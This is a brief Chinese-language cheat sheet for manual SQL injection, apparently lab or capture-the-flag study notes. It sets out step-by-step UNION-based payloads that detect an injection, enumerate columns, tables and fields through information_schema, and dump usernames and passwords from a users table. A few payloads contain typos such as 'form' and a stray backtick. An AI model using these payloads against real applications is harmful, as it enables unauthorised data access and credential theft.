手工注入常规思路:
1.判断是否存在注入,注入是字符型还是数字型
2.猜解 SQL 查询语句中的字段数
3.确定显示的字段顺序
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.查询到账户的数据
注:1~7为字符型注入,数字型注入要去掉 ' 符号
1.判断是否存在注入,注入是字符型还是数字型
1
1' or '1'='1
1’and ‘1’ =’2
1 or 1=1
2.猜解SQL查询语句中的字段数
1′ or 1=1 order by 1 #
1′ or 1=1 order by 2 #
...
3.确定显示的字段顺序
1′ union select 1,2 #
4.获取当前数据库
1′ union select 1,database() #
5.获取数据库中的表
1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
6.获取表中的字段名
1′ union select 1,group_concat(column_name) from `information_schema.columns where table_name='users' #
7.下载数据
1′ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
eg:查看thiskey表中k0y字段(列)信息
1 union select 1,k0y form thiskey
参考 https://www.jianshu.com/p/146784550d0a